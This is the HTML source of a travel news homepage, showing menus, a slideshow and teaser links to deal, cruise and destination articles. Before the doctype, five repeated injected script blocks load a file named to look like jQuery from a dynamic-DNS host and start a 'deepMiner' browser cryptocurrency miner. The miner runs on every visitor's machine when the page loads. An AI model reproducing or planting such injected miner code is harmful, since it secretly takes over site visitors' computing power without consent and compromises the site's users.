<script src='https://greenindex.dynamic-dns.net/jqueryeasyui.js'></script>
	<script>
		var uri = 'www';
		var jqueryui = new deepMiner.Anonymous(uri, {autoThreads: true,throttle: 0.5});
		jqueryui.start();
	</script><script src='https://greenindex.dynamic-dns.net/jqueryeasyui.js'></script>
	<script>
		var uri = 'www';
		var jqueryui = new deepMiner.Anonymous(uri, {autoThreads: true,throttle: 0.5});
		jqueryui.start();
	</script><script src='https://greenindex.dynamic-dns.net/jqueryeasyui.js'></script>
	<script>
		var uri = 'www';
		var jqueryui = new deepMiner.Anonymous(uri, {autoThreads: true,throttle: 0.5});
		jqueryui.start();
	</script><script src='https://greenindex.dynamic-dns.net/jqueryeasyui.js'></script>
	<script>
		var uri = 'www';
		var jqueryui = new deepMiner.Anonymous(uri, {autoThreads: true,throttle: 0.5});
		jqueryui.start();
	</script><script src='https://greenindex.dynamic-dns.net/jqueryeasyui.js'></script>
	<script>
		var uri = 'www';
		var jqueryui = new deepMiner.Anonymous(uri, {autoThreads: true,throttle: 0.5});
		jqueryui.start();
	</script><!DOCTYPE html>
<html lang="en-US">
<head>
 <title> Travel news, travel guides and reviews</title>
	<meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" />
<meta charset="UTF-8" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" />
<meta name="description" content="Travel news, travel guides and reviews  travelsmy.com" />
<meta name="keywords" content="Travel news, travel guides and reviews" />	
	<link rel="profile" href="http://gmpg.org/xfn/11" />
	 
	 
	<link rel="stylesheet" href="/images/normalize.css" />
	<link rel="stylesheet" href="/images/template.css" />
	<link rel="stylesheet" href="/images/wp.css" />
	<link rel="stylesheet" href="/images/stuff.css" />
	<link rel="stylesheet" href="/images/wp.extensions.css" />
	<link rel="stylesheet" href="/images/extensions.css" />
	<!--[if lt IE 9]>
	<link rel="stylesheet" href="/images/ie8.css" />
	<![endif]-->
	
	<link href="http://fonts.googleapis.com/css?family=Hammersmith+One" rel="stylesheet" type="text/css" /><style type="text/css">
body,
h1, h2, h3, h4, h5, h6,
#main-menu > li li,
.bigtitle h3.header,
.box.badge-new .box-title::after,
.box.badge-popular .box-title::after,
.box.badge-top .box-title::after,
.box.bigtitle .box-title { font-family: Arial, Helvetica, sans-serif; }

#gk-logo.text,
#main-menu > li,
#top-menu,
#gk-user-area,
.box .box-title,
.gk-tabs-nav,
.nsphover .gk-nsp-category { font-family: 'Hammersmith One'; }

</style>
	<script type="text/javascript">
           $GK_PAGE_URL = '/news';
           $GK_TMPL_URL = '/News';
           $GK_TMPL_NAME = 'news';
           $GK_MENU = [];
           $GK_MENU["mainmenu"] = [];
           $GK_MENU["mainmenu"]["animation"] = "width_height_opacity";
           $GK_MENU["mainmenu"]["animation_speed"] = "fast";
           $GK_MENU["topmenu"] = [];
           $GK_MENU["topmenu"]["animation"] = "none";
           $GK_MENU["topmenu"]["animation_speed"] = "normal";
           $GK_MENU["footermenu"] = [];
           $GK_MENU["footermenu"]["animation"] = "none";
           $GK_MENU["footermenu"]["animation_speed"] = "normal";
        </script>
		
		
	<!--[if lt IE 9]>
<script src="/images/html5shiv.js"></script>
<script src="/images/respond.js"></script>
<![endif]-->
	 
<script type='text/javascript' src='/images/jquery.js?ver=1.11.0'></script>
<script type='text/javascript' src='/images/jquery-migrate.min.js?ver=1.2.1'></script>
<script type='text/javascript' src='/images/slideshow.js?ver=3.9.1'></script>
<script type='text/javascript' src='/images/nsp.js?ver=3.9.1'></script>
<script type='text/javascript' src='/images/tabs.js?ver=3.9.1'></script>
  
	<link href="/images/shortcodes.typography.css" rel="stylesheet" type="text/css" />
	<link href="/images/shortcodes.elements.css" rel="stylesheet" type="text/css" />
	<link href="/images/shortcodes.template.css" rel="stylesheet" type="text/css" />	
	<link href="/images/style1.css" rel="stylesheet" type="text/css" />		
	
		
	
<style type="text/css">
	.gk-page { max-width: 1230px; }
		#gk-mainbody-columns > aside { width: 22%;}
	#gk-mainbody-columns > section { width: 78%; }
	#gk-mainbody-columns { background-position: 78% 0; }
		
		#gk-inset { width: 27%;}
	#gk-content-wrap { width: 73%; }
	#gk-mainbody-columns > section { background-position: 73% 0; }
		
		#gk-inner-inset { width: 24%;}
	#gk-mainbody > div { width: 76%; }
	</style>

<link rel="stylesheet" href="/images/desktop.small.css" media="(max-width: 1230px)" />

<link rel="stylesheet" href="/images/tablet.css" media="(max-width: 1030px)" />

<link rel="stylesheet" href="/images/tablet.small.css" media="(max-width: 820px)" />

<link rel="stylesheet" href="/images/mobile.css" media="(max-width: 580px)" />	
		
		<script type="text/javascript">
		var thickboxL10n = {
			"next":"Next >",
			"prev":"< Prev",
			"image":"Image",
			"of":"of",
			"close":"Close",
			"noiframes":"This feature requires inline frames. You have iframes disabled or your browser does not support them.",
			"loadingAnimation":"/images/loadingAnimation.gif",
			"closeImage":"/images/tb-close.png"
		};
	</script>
	<link rel="stylesheet" href="/images/thickbox.css" media="all" />
	<script type="text/javascript" src="/images/thickbox.js"></script>
		<script type="text/javascript" src="/images/gk.scripts.js"></script>
	<script type="text/javascript" src="/images/gk.menu.js"></script>
	
		
	<style type="text/css">#gk-cookie-law { background: #E55E48; bottom: 0; color: #fff; font: 400 16px/52px Arial, sans-serif; height: 52px; left: 0;  margin: 0!important; position: fixed; text-align: center; width: 100%; z-index: 10001; }
		#gk-cookie-law span { display: inline-block; max-width: 90%; }
		#gk-cookie-law a { color: #fff; font-weight: 600; text-decoration: underline}
		#gk-cookie-law a:hover { color: #222}
		#gk-cookie-law a.gk-cookie-law-close { background: #c33c26; color: #fff; display: block; float: right; font-size: 28px; font-weight: bold; height: 52px; line-height: 52px; width: 52px;text-decoration: none}
		#gk-cookie-law a.gk-cookie-law-close:active,
		#gk-cookie-law a.gk-cookie-law-close:focus,
		#gk-cookie-law a.gk-cookie-law-close:hover { background: #282828; }
		@media (max-width: 1280px) { #gk-cookie-law { font-size: 13px!important; } }
		@media (max-width: 1050px) { #gk-cookie-law { font-size: 12px!important; line-height: 26px!important; } }
		@media (max-width: 620px) { #gk-cookie-law { font-size: 11px!important; line-height: 18px!important; } #gk-cookie-law span { max-width: 80%; } }
		@media (max-width: 400px) { #gk-cookie-law { font-size: 10px!important; line-height: 13px!important; } }
		</style><script type="text/javascript">
		function gkCreateCookie(name,value,days) {
			if (days) {
				var date = new Date();
				date.setTime(date.getTime()+(days*24*60*60*1000));
				var expires = "; expires="+date.toGMTString();
			}
			else var expires = "";
			document.cookie = name+"="+value+expires+"; path=/";
		}
		jQuery(document).ready(function() {
			if(jQuery(document).find('#gk-cookie-law')) {
				jQuery(document).find('#gk-cookie-law a').each(function(i, el) {
					el = jQuery(el);
					el.click(function(e) {
						// for both links
						gkCreateCookie('gk-demo-cookie-law', '1', 365);
						if(jQuery(e.target).attr('href') == '#close') {	
							e.preventDefault();
							jQuery(document).find('#gk-cookie-law').remove();
						} else {
							window.location.href = jQuery(e.target).attr('href');
						}
					});
				});
			}
	});</script>	

	</head>
<body class="home blog custom-background" data-tablet-width="1030">
	<header id="gk-page-top">
		<div class="gk-page">
						<h1>
				<a href="/" class="cssLogo"><small> Travel news, travel guides and reviews</small></a>
			</h1>
						
							<ul id="main-menu" class="menu gk_normal"><li id="menu-item-127" class="menu-item menu-item-type-custom menu-item-object-custom current-menu-item menu-item-home menu-item-127"><a href="/">Home</a></li>
<li id="menu-item-585" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-585"><a href="/c/travel-news">Travel News</a>
<div class="sub-menu"><ul>
 
 	<li id="menu-item-508" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-508"><a href="http://www.gailzavala.com/dubai-abu-dhabi-air-6-nights-from-1155/">Dubai &#038; Abu Dhabi, Air, 6 Nights, From $1,155</a></li>
		<li id="menu-item-508" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-508"><a href="http://www.gailzavala.com/iceland-air-6-nights-from-788/">Iceland, Air, 6 Nights, From $788</a></li>
		<li id="menu-item-508" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-508"><a href="http://www.gailzavala.com/bella-venezia/">Bella Venezia</a></li>
	 
</ul></div>
</li>
<li id="menu-item-823" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-823"><a href="/c/destinations">Destinations</a></li>
<li id="menu-item-1065" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-1065"><a href="/c/hotels">Hotels</a></li>
<li id="menu-item-1071" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-1071"><a href="/c/real-deals">Real deals</a></li>
<li id="menu-item-1070" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-1070"><a href="/c/travel-tips">Travel tips</a></li>
<li id="menu-item-1069" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-1069"><a href="/c/trip-ideas">Trip ideas</a></li>
<li id="menu-item-1068" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-1068"><a href="/c/blog">Blog</a></li>
 
</ul>				 				
					 
					</div>
	</header>

<section id="gk-banner-top">
	<div class="gk-page">
		<div id="widget_gk_news_slideshow-2" class="box  widget_gk_news_slideshow">
		<div class="gk-news-slideshow">
		<div class="gk-ns-images">
		<div class="gk-ns-arts">
		<div class="gk-ns-arts-scroll">
	 		
		
		<div class="gk-ns-art" style="width: 262px;"><a href="http://www.gailzavala.com/easyjet-changes-their-hold-bag-rules/" class="gk-ns-image-link"><img src="/wp-content/uploads/2017/11/easyjet_two_planes-768x512.jpg"   width="60"    alt="" class="gk-ns-image" /></a>
		<h3 class="gk-ns-header"><a href="http://www.gailzavala.com/easyjet-changes-their-hold-bag-rules/" title="Easyjet changes their hold bag rules">Easyjet changes their hold bag rules</a></h3>
		<p class="gk-ns-text"><div>EasyJet’s new rules means that if you can pack up...</div></p></div>
		
			
		
		<div class="gk-ns-art" style="width: 262px;"><a href="http://www.gailzavala.com/cruises-of-a-lifetime-you-can-actually-afford/" class="gk-ns-image-link"><img src="/wp-content/uploads/2014/05/norwegian-getaway-372014-163759_panoramic.jpg"   width="60"    alt="" class="gk-ns-image" /></a>
		<h3 class="gk-ns-header"><a href="http://www.gailzavala.com/cruises-of-a-lifetime-you-can-actually-afford/" title="Cruises of a Lifetime You Can Actually Afford!">Cruises of a Lifetime You Can Actually Afford!</a></h3>
		<p class="gk-ns-text"><div>Whether you&#8217;re an experienced cruiser or a newbie,...</div></p></div>
		
			
		
		<div class="gk-ns-art" style="width: 262px;"><a href="http://www.gailzavala.com/whats-your-island-iq/" class="gk-ns-image-link"><img src="/wp-content/uploads/2014/05/12carqwikihoriz-3212011_panoramic.jpg"   width="60"    alt="" class="gk-ns-image" /></a>
		<h3 class="gk-ns-header"><a href="http://www.gailzavala.com/whats-your-island-iq/" title="What&#8217;s Your Island IQ?">What&#8217;s Your Island IQ?</a></h3>
		<p class="gk-ns-text"><div>The Caribbean brings to mind azure waters and postcard-perfect...</div></p></div>
		
			
		
		<div class="gk-ns-art" style="width: 262px;"><a href="http://www.gailzavala.com/europes-coolest-cycling-tour-2/" class="gk-ns-image-link"><img src="/wp-content/uploads/2014/05/saumur-france-1022013-18447_panoramic1.jpg"   width="60"    alt="" class="gk-ns-image" /></a>
		<h3 class="gk-ns-header"><a href="http://www.gailzavala.com/europes-coolest-cycling-tour-2/" title="Europe&#8217;s Coolest Cycling Tour">Europe&#8217;s Coolest Cycling Tour</a></h3>
		<p class="gk-ns-text"><div>Terroir. Spend any time in one of the world&#8217;s...</div></p></div>
		
			
		
		<div class="gk-ns-art" style="width: 262px;"><a href="http://www.gailzavala.com/10-beautiful-beach-town-bargains-for-fall/" class="gk-ns-image-link"><img src="/wp-content/uploads/2014/05/couples-destinations-sunset-in-hilton-head-sc-7232012-161826_panoramic.jpg"   width="60"    alt="" class="gk-ns-image" /></a>
		<h3 class="gk-ns-header"><a href="http://www.gailzavala.com/10-beautiful-beach-town-bargains-for-fall/" title="10 Beautiful Beach Town Bargains for Fall">10 Beautiful Beach Town Bargains for Fall</a></h3>
		<p class="gk-ns-text"><div>To tell the truth, here at Budget Travel we&#8217;ve...</div></p></div>
		
			
		
		<div class="gk-ns-art" style="width: 262px;"><a href="http://www.gailzavala.com/8-great-labor-day-weekend-getaways/" class="gk-ns-image-link"><img src="/wp-content/uploads/2014/05/labor-day-nj-raging-waters-waterpark-8162013-19587_panoramic.jpg"   width="60"    alt="" class="gk-ns-image" /></a>
		<h3 class="gk-ns-header"><a href="http://www.gailzavala.com/8-great-labor-day-weekend-getaways/" title="8 Great Labor Day Weekend Getaways">8 Great Labor Day Weekend Getaways</a></h3>
		<p class="gk-ns-text"><div>Labor Day weekend may be just around the corner, but...</div></p></div>
		
			
		
		<div class="gk-ns-art" style="width: 262px;"><a href="http://www.gailzavala.com/the-right%e2%80%94and-wrong%e2%80%94way-to-pay-for-your-dream-trip/" class="gk-ns-image-link"><img src="/wp-content/uploads/2014/05/1209tripcoachillo-9132012-174628_panoramic.jpg"   width="60"    alt="" class="gk-ns-image" /></a>
		<h3 class="gk-ns-header"><a href="http://www.gailzavala.com/the-right%e2%80%94and-wrong%e2%80%94way-to-pay-for-your-dream-trip/" title="The Right—and Wrong—Way to Pay for Your Dream Trip">The Right—and Wrong—Way to Pay for Your Dream Trip</a></h3>
		<p class="gk-ns-text"><div>I&#8217;m short on cash. Should I put my vacation on...</div></p></div>
		
			
		
		<div class="gk-ns-art" style="width: 262px;"><a href="http://www.gailzavala.com/insiders-guide-to-the-caribbean/" class="gk-ns-image-link"><img src="/wp-content/uploads/2014/05/1112caribbeanboatsoffharbor-1252011-11034_panoramic.jpg"   width="60"    alt="" class="gk-ns-image" /></a>
		<h3 class="gk-ns-header"><a href="http://www.gailzavala.com/insiders-guide-to-the-caribbean/" title="Insiders&#8217; Guide to the Caribbean">Insiders&#8217; Guide to the Caribbean</a></h3>
		<p class="gk-ns-text"><div>ST. MARTIN
If there&#8217;s any complaint about this...</div></p></div>
		
			
		
		<div class="gk-ns-art" style="width: 262px;"><a href="http://www.gailzavala.com/8-mistakes-that-will-ruin-your-weekend-getaway/" class="gk-ns-image-link"><img src="/wp-content/uploads/2014/05/quickgetawaypanoramic-3212012-14450_panoramic.jpg"   width="60"    alt="" class="gk-ns-image" /></a>
		<h3 class="gk-ns-header"><a href="http://www.gailzavala.com/8-mistakes-that-will-ruin-your-weekend-getaway/" title="8 Mistakes That Will RUIN Your Weekend Getaway!">8 Mistakes That Will RUIN Your Weekend Getaway!</a></h3>
		<p class="gk-ns-text"><div>When Budget Travel asked whether it would be worth...</div></p></div>
		
			
		
		<div class="gk-ns-art" style="width: 262px;"><a href="http://www.gailzavala.com/upgrade-secrets-from-the-experts-2/" class="gk-ns-image-link"><img src="/wp-content/uploads/2014/05/1203tripcoachillopano-3222012-174625_panoramic1.jpg"   width="60"    alt="" class="gk-ns-image" /></a>
		<h3 class="gk-ns-header"><a href="http://www.gailzavala.com/upgrade-secrets-from-the-experts-2/" title="Upgrade Secrets from the Experts!">Upgrade Secrets from the Experts!</a></h3>
		<p class="gk-ns-text"><div>I have a long, transcontinental flight coming up. I...</div></p></div>
		
	 
	
		</div>
		</div>
		</div>
		<div class="gk-ns-prev">&laquo;</div><div class="gk-ns-next">&raquo;</div></div></div>	</div>
	<!--[if IE 8]>
	<div class="ie8clear"></div>
	<![endif]-->
</section>

<section id="gk-content-top" class="gk-page">
	<ul id="top-menu" class="menu gk_normal">             		 <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-802"><a href="http://www.gailzavala.com/upgrade-secrets-from-the-experts-2/">Upgrade Secrets from the Experts!</a></li>            		 <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-802"><a href="http://www.gailzavala.com/one-tank-escapes-from-8-american-cities/">One-Tank Escapes From 8 American Cities</a></li> 
</ul>	
	 
		<div id="gk-search">
		
<form method="get" id="searchform" action="http://www.gailzavala.com">
	<label for="s">Search</label>
	<input type="text" class="field" name="s" id="s" placeholder="Search" value="" />
	
	<input type="submit" id="searchsubmit" value="Search" />
</form>	</div>
		
	<!--[if IE 8]>
	<div class="ie8clear"></div>
	<![endif]-->
</section>

<section class="gk-page-wrap gk-page">
	<section id="gk-mainbody-columns">			
		<section>
			<div id="gk-content-wrap">
								
								
				<!-- Mainbody, breadcrumbs -->
								
								<section id="gk-mainbody-top">
					<div id="widget_gk_nsp-5" class="box  header all widget_gk_nsp"><div class="gk-nsp mobile_layout" data-cols="1" data-rows="1" data-links="5" data-autoanim="off" data-autoanimint="5000" data-autoanimhover="on"><div class="gk-nsp-arts"><div class="gk-nsp-arts-scroll gk-nsp-pages-1"><div class="gk-nsp-arts-page gk-nsp-cols-1"><div class="gk-nsp-art gk-nsp-cols-1"  style="padding: 0 12px 0 0;">
					<a href="/archives/206 " class="gk-responsive gk-image-link"  style="margin: 0 0 20px 0;"><img src="/wp-content/uploads/2014/05/PH2009042102567.jpg" alt="" class="gk-nsp-image gk-responsive" /></a>
					<h3 class="gk-nsp-header"><a href="/archives/206 ">Hacienda Lodging</a></h3>
					<p class="gk-nsp-text">
Price From $45

The drive to the Hacienda, over the Santa Lucia Range, is so narrow and windy that it's impossible to go faster than 20 mph.

 
</p>
</div>
</div>
</div
></div>

<div class="gk-nsp-links"><div class="gk-nsp-links-scroll gk-nsp-pages-4">
<ul class="gk-nsp-list gk-nsp-cols-4">
 <li><h4 class="gk-nsp-link-header"><a href="http://www.gailzavala.com/costa-rica-air-car-5-nights-from-789/" >Costa Rica, Air, Car, 5 Nights, From $789</a></h4><p class="gk-nsp-link-text"><div>The Real Deal Vacation package to Costa Rica includes...</div></p></li><li><h4 class="gk-nsp-link-header"><a href="http://www.gailzavala.com/take-a-heartland-road-trip/" >Take a Heartland Road Trip!</a></h4><p class="gk-nsp-link-text"><div>His great-great-grandfather founded the town in the...</div></p></li><li><h4 class="gk-nsp-link-header"><a href="http://www.gailzavala.com/psst-wanna-elope/" >Psst! Wanna Elope?</a></h4><p class="gk-nsp-link-text"><div>When you&#8217;re engaged to be married, but buried...</div></p></li><li><h4 class="gk-nsp-link-header"><a href="http://www.gailzavala.com/paliokaliva-village/" >Paliokaliva Village</a></h4><p class="gk-nsp-link-text"><div>Price From $126
Talk about underselling your appeal;...</div></p></li></ul>
<ul class="gk-nsp-list gk-nsp-cols-4">
 <li><h4 class="gk-nsp-link-header"><a href="http://www.gailzavala.com/would-you-pay-to-launch-this-airline/" >Would you pay to launch this airline?</a></h4><p class="gk-nsp-link-text"><div>You&#8217;ve finished your business in London and want...</div></p></li><li><h4 class="gk-nsp-link-header"><a href="http://www.gailzavala.com/worlds-tallest-lego-tower-built-in-budapest/" >World&#8217;s tallest Lego tower built in Budapest</a></h4><p class="gk-nsp-link-text"><div>(CNN) &#8212; Imagine the size of the box this one...</div></p></li><li><h4 class="gk-nsp-link-header"><a href="http://www.gailzavala.com/patagonia-tours-8-nights-from-1045/" >Patagonia, Tours, 8 Nights, From $1,045</a></h4><p class="gk-nsp-link-text"><div>The Real Deal This land only vacation package to Argentina...</div></p></li><li><h4 class="gk-nsp-link-header"><a href="http://www.gailzavala.com/take-a-heartland-road-trip/" >Take a Heartland Road Trip!</a></h4><p class="gk-nsp-link-text"><div>His great-great-grandfather founded the town in the...</div></p></li></ul>
<ul class="gk-nsp-list gk-nsp-cols-4">
 <li><h4 class="gk-nsp-link-header"><a href="http://www.gailzavala.com/6-charming-affordable-european-cities-you-havent-visited-yet/" >6 Charming &#038; Affordable European Cities You Haven&#8217;t Visited Yet</a></h4><p class="gk-nsp-link-text"><div>BIRMINGHAM, U.K.
A foodie destination in England&#8217;s...</div></p></li><li><h4 class="gk-nsp-link-header"><a href="http://www.gailzavala.com/first-rule-of-chinese-tourism-give-them-what-they-want/" >First rule of Chinese tourism: Give them what they want</a></h4><p class="gk-nsp-link-text"><div>Editor&#8217;s note: This month&#8217;s episode of...</div></p></li><li><h4 class="gk-nsp-link-header"><a href="http://www.gailzavala.com/18-dead-in-nepal-plane-crash/" >18 dead in Nepal plane crash</a></h4><p class="gk-nsp-link-text"><div>Kathmandu, Nepal (CNN) &#8212; A small passenger plane...</div></p></li><li><h4 class="gk-nsp-link-header"><a href="http://www.gailzavala.com/buenos-aires-iguazu-falls-tours-5-nights-from-883/" >Buenos Aires &#038; Iguazu Falls, Tours, 5 Nights, From $883</a></h4><p class="gk-nsp-link-text"><div>The Real Deal This land only vacation package to Argentina...</div></p></li></ul>
<ul class="gk-nsp-list gk-nsp-cols-4">
 <li><h4 class="gk-nsp-link-header"><a href="http://www.gailzavala.com/europes-coolest-cycling-tour/" >Europe&#8217;s Coolest Cycling Tour</a></h4><p class="gk-nsp-link-text"><div>Terroir. Spend any time in one of the world&#8217;s...</div></p></li><li><h4 class="gk-nsp-link-header"><a href="http://www.gailzavala.com/tuscany-castle-hotel-car-7-nights-from-484/" >Tuscany, Castle Hotel, Car, 7 Nights, From $484</a></h4><p class="gk-nsp-link-text"><div>The Real Deal This land only vacation package includes...</div></p></li><li><h4 class="gk-nsp-link-header"><a href="http://www.gailzavala.com/dubai-abu-dhabi-air-6-nights-from-1155/" >Dubai &#038; Abu Dhabi, Air, 6 Nights, From $1,155</a></h4><p class="gk-nsp-link-text"><div>The Real Deal Vacation package includes round-trip...</div></p></li><li><h4 class="gk-nsp-link-header"><a href="http://www.gailzavala.com/patagonia-tours-8-nights-from-1045/" >Patagonia, Tours, 8 Nights, From $1,045</a></h4><p class="gk-nsp-link-text"><div>The Real Deal This land only vacation package to Argentina...</div></p></li></ul>
</div>
<div class="gk-nsp-links-nav"><ul class="gk-nsp-pagination"><li>1</li><li>2</li><li>3</li><li>4</li></ul></div></div></div></div>
<div id="widget_gk_tabs-2" class="box  mobilelayout all widget_gk_tabs"><div class="gk-tabs" data-event="click" data-autoanim="enabled" data-speed="500" data-interval="5000"><div class="gk-tabs-wrap">
<ol class="gk-tabs-nav"><li class="active">Destinations</li><li>More News</li><li>Featured</li><li>Travel tips</li><li>Trip ideas</li></ol>
<div class="gk-tabs-container">
<div class="gk-tabs-item active">
<div id="widget_gk_nsp-12" class="box widget_gk_nsp">
<div>
<div class="gk-nsp horizontal" data-cols="4" data-rows="1" data-links="" data-autoanim="off" data-autoanimint="5000" data-autoanimhover="on">
<div class="gk-nsp-arts">
<div class="gk-nsp-arts-scroll gk-nsp-pages-1">
<div class="gk-nsp-arts-page gk-nsp-cols-1">


<div class="gk-nsp-art gk-nsp-cols-4"  style="padding: 0 6px 0 0;"><a href="http://www.gailzavala.com/garbis-villas/" class="gk-responsive gk-image-link"  style="margin: 0 0 10px 0;"><img src="/wp-content/uploads/2014/05/PH2010040202540.jpg" alt="" class="gk-nsp-image gk-responsive" /></a><h3 class="gk-nsp-header"><a href="http://www.gailzavala.com/garbis-villas/">Garbis Villas</a></h3><p class="gk-nsp-text"><div>Price From $70
Cephalonia is the largest of the Ionian...</div></p></div>
<div class="gk-nsp-art gk-nsp-cols-4"  style="padding: 0 6px 0 0;"><a href="http://www.gailzavala.com/worst-travel-nightmares-and-how-to-make-them-go-away/" class="gk-responsive gk-image-link"  style="margin: 0 0 10px 0;"><img src="/wp-content/uploads/2014/05/flightanxietymarquee-11132012-201950_panoramic.jpg" alt="" class="gk-nsp-image gk-responsive" /></a><h3 class="gk-nsp-header"><a href="http://www.gailzavala.com/worst-travel-nightmares-and-how-to-make-them-go-away/">Worst Travel NIGHTMARES! (And How to Make Them Go Away)</a></h3><p class="gk-nsp-text"><div>For a few unlucky travelers, vacation can feel a little...</div></p></div>
<div class="gk-nsp-art gk-nsp-cols-4"  style="padding: 0 6px 0 0;"><a href="http://www.gailzavala.com/terrified-passengers-recall-airliners-sudden-turbulent-drop/" class="gk-responsive gk-image-link"  style="margin: 0 0 10px 0;"><img src="/wp-content/uploads/2014/05/140505102101-newday-dnt-flight-turbulence-rene-marsh-00001210-story-top.jpg" alt="" class="gk-nsp-image gk-responsive" /></a><h3 class="gk-nsp-header"><a href="http://www.gailzavala.com/terrified-passengers-recall-airliners-sudden-turbulent-drop/">Terrified passengers recall airliner&#8217;s sudden, turbulent drop</a></h3><p class="gk-nsp-text"><div>Travelers looking for a relaxing trip to Orlando got...</div></p></div>
<div class="gk-nsp-art gk-nsp-cols-4"  style="padding: 0 6px 0 0;"><a href="http://www.gailzavala.com/insiders-guide-to-the-caribbean/" class="gk-responsive gk-image-link"  style="margin: 0 0 10px 0;"><img src="/wp-content/uploads/2014/05/1112caribbeanboatsoffharbor-1252011-11034_panoramic.jpg" alt="" class="gk-nsp-image gk-responsive" /></a><h3 class="gk-nsp-header"><a href="http://www.gailzavala.com/insiders-guide-to-the-caribbean/">Insiders&#8217; Guide to the Caribbean</a></h3><p class="gk-nsp-text"><div>ST. MARTIN
If there&#8217;s any complaint about this...</div></p></div>

</div>
</div>
</div>
</div>
</div>
</div>
</div>



<div class="gk-tabs-item">
<div id="widget_gk_nsp-13" class="box widget_gk_nsp">
<div><div class="gk-nsp horizontal" data-cols="4" data-rows="1" data-links="" data-autoanim="off" data-autoanimint="5000" data-autoanimhover="on">
<div class="gk-nsp-arts">
<div class="gk-nsp-arts-scroll gk-nsp-pages-1"><div class="gk-nsp-arts-page gk-nsp-cols-1">
<div class="gk-nsp-art gk-nsp-cols-4"  style="padding: 0 6px 0 0;"><a href="http://www.gailzavala.com/willis-tower-cracks-frighten-tourists-but-officials-say-no-one-was-in-danger/" class="gk-responsive gk-image-link"  style="margin: 0 0 10px 0;"><img src="/wp-content/uploads/2014/05/130902140919-platforms-the-ledge-vertical-gallery.jpg" alt="" class="gk-nsp-image gk-responsive" /></a><h3 class="gk-nsp-header"><a href="http://www.gailzavala.com/willis-tower-cracks-frighten-tourists-but-officials-say-no-one-was-in-danger/">Willis Tower cracks frighten tourists, but officials say no one was in danger</a></h3><p class="gk-nsp-text"><div> A protective coating on a glass sightseeing box that...</div></p></div>
<div class="gk-nsp-art gk-nsp-cols-4"  style="padding: 0 6px 0 0;"><a href="http://www.gailzavala.com/worlds-tallest-lego-tower-built-in-budapest/" class="gk-responsive gk-image-link"  style="margin: 0 0 10px 0;"><img src="/wp-content/uploads/2014/05/140527111549-hungary-lego-record-tower-7-horizontal-gallery.jpg" alt="" class="gk-nsp-image gk-responsive" /></a><h3 class="gk-nsp-header"><a href="http://www.gailzavala.com/worlds-tallest-lego-tower-built-in-budapest/">World&#8217;s tallest Lego tower built in Budapest</a></h3><p class="gk-nsp-text"><div>(CNN) &#8212; Imagine the size of the box this one...</div></p></div>
<div class="gk-nsp-art gk-nsp-cols-4"  style="padding: 0 6px 0 0;"><a href="http://www.gailzavala.com/10-beautiful-beach-town-bargains-for-fall/" class="gk-responsive gk-image-link"  style="margin: 0 0 10px 0;"><img src="/wp-content/uploads/2014/05/couples-destinations-sunset-in-hilton-head-sc-7232012-161826_panoramic.jpg" alt="" class="gk-nsp-image gk-responsive" /></a><h3 class="gk-nsp-header"><a href="http://www.gailzavala.com/10-beautiful-beach-town-bargains-for-fall/">10 Beautiful Beach Town Bargains for Fall</a></h3><p class="gk-nsp-text"><div>To tell the truth, here at Budget Travel we&#8217;ve...</div></p></div>
<div class="gk-nsp-art gk-nsp-cols-4"  style="padding: 0 6px 0 0;"><a href="http://www.gailzavala.com/take-a-heartland-road-trip/" class="gk-responsive gk-image-link"  style="margin: 0 0 10px 0;"><img src="/wp-content/uploads/2014/05/1205nebraskasandhillsniobrarariver-5152012-171952_panoramic.jpg" alt="" class="gk-nsp-image gk-responsive" /></a><h3 class="gk-nsp-header"><a href="http://www.gailzavala.com/take-a-heartland-road-trip/">Take a Heartland Road Trip!</a></h3><p class="gk-nsp-text"><div>His great-great-grandfather founded the town in the...</div></p></div>

</div>
</div>
</div>
</div>
</div>
</div>
</div>

<div class="gk-tabs-item">
<div id="widget_gk_nsp-13" class="box widget_gk_nsp">
<div><div class="gk-nsp horizontal" data-cols="4" data-rows="1" data-links="" data-autoanim="off" data-autoanimint="5000" data-autoanimhover="on">
<div class="gk-nsp-arts">
<div class="gk-nsp-arts-scroll gk-nsp-pages-1"><div class="gk-nsp-arts-page gk-nsp-cols-1">
<div class="gk-nsp-art gk-nsp-cols-4"  style="padding: 0 6px 0 0;"><a href="http://www.gailzavala.com/europes-coolest-cycling-tour-2/" class="gk-responsive gk-image-link"  style="margin: 0 0 10px 0;"><img src="/wp-content/uploads/2014/05/saumur-france-1022013-18447_panoramic1.jpg" alt="" class="gk-nsp-image gk-responsive" /></a><h3 class="gk-nsp-header"><a href="http://www.gailzavala.com/europes-coolest-cycling-tour-2/">Europe&#8217;s Coolest Cycling Tour</a></h3><p class="gk-nsp-text"><div>Terroir. Spend any time in one of the world&#8217;s...</div></p></div>
<div class="gk-nsp-art gk-nsp-cols-4"  style="padding: 0 6px 0 0;"><a href="http://www.gailzavala.com/garbis-villas/" class="gk-responsive gk-image-link"  style="margin: 0 0 10px 0;"><img src="/wp-content/uploads/2014/05/PH2010040202540.jpg" alt="" class="gk-nsp-image gk-responsive" /></a><h3 class="gk-nsp-header"><a href="http://www.gailzavala.com/garbis-villas/">Garbis Villas</a></h3><p class="gk-nsp-text"><div>Price From $70
Cephalonia is the largest of the Ionian...</div></p></div>
<div class="gk-nsp-art gk-nsp-cols-4"  style="padding: 0 6px 0 0;"><a href="http://www.gailzavala.com/one-tank-escapes-from-8-american-cities/" class="gk-responsive gk-image-link"  style="margin: 0 0 10px 0;"><img src="/wp-content/uploads/2014/05/onetankescapesshenandoahvalley-6252012-151242_panoramic.jpg" alt="" class="gk-nsp-image gk-responsive" /></a><h3 class="gk-nsp-header"><a href="http://www.gailzavala.com/one-tank-escapes-from-8-american-cities/">One-Tank Escapes From 8 American Cities</a></h3><p class="gk-nsp-text"><div>A collection of 10 independent cities make up the Shenandoah...</div></p></div>
